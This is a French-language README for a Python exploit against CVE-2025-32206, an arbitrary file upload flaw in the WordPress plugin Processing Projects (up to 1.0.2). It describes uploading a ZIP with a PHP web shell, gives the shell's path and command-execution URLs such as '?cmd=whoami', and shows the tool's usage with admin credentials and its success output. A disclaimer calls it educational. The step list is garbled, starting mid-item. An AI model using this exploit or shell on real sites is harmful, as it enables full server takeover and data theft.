
Le plugin WordPress Processing Projects <= 1.0.2 est vulnérable au téléchargement arbitraire de fichiers.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H« Vulnérabilité de téléchargement sans restriction d'un fichier de type dangereux dans LABCAT Processing Projects permettant à des attaquants de télécharger une coquille web (web shell) sur un serveur web. Cela peut conduire à une compromission totale. »
Ce script d'exploitation en Python cible les sites WordPress utilisant le plugin vulnérable Processing Projects (version <= 1.0.2). Le plugin gère incorrectement les téléchargements de fichiers provenant d'utilisateurs authentifiés, leur permettant ainsi de télécharger des fichiers ZIP arbitraires contenant du code PHP exécutable (coquilles web).
Le script d'exploitation :
Nxploited.zip) contenant une coquille PHP malveillante (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpUne fois la coquille téléchargée avec succès, elle peut être utilisée pour exécuter des commandes système via le paramètre cmd. Exemples :
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Cette coquille exécute des commandes OS arbitraires et retourne leur résultat directement dans la réponse.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit pour CVE-2025-32206 | Par Nxploited (Khaled Alenazi)
options:
-h, --help affiche ce message d'aide et quitte
-u, --url URL URL cible WordPress (ex. http://target.com/wordpress)
-un, --username USERNAME nom d'utilisateur administrateur WordPress
-p, --password PASSWORD mot de passe administrateur WordPress
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Téléchargement arbitraire de fichier
[+] Par Nxploited | Khaled Alenazi
[+] Archive zip créée avec la coquille : Nxploited.zip -> Nxploit.php
[+] Connexion réussie.
[+] Champs du formulaire extraits avec succès.
[+] Requête de téléchargement envoyée avec succès.
[+] Coquille exécutée à : http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Ce script est fourni à des fins éducatives uniquement. Toute utilisation non autorisée de cet exploit sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
Suivez toujours les pratiques de divulgation responsable et n'utilisez cet outil que dans des environnements contrôlés ou avec une autorisation explicite.
Par : Nxploited | Khaled Alenazi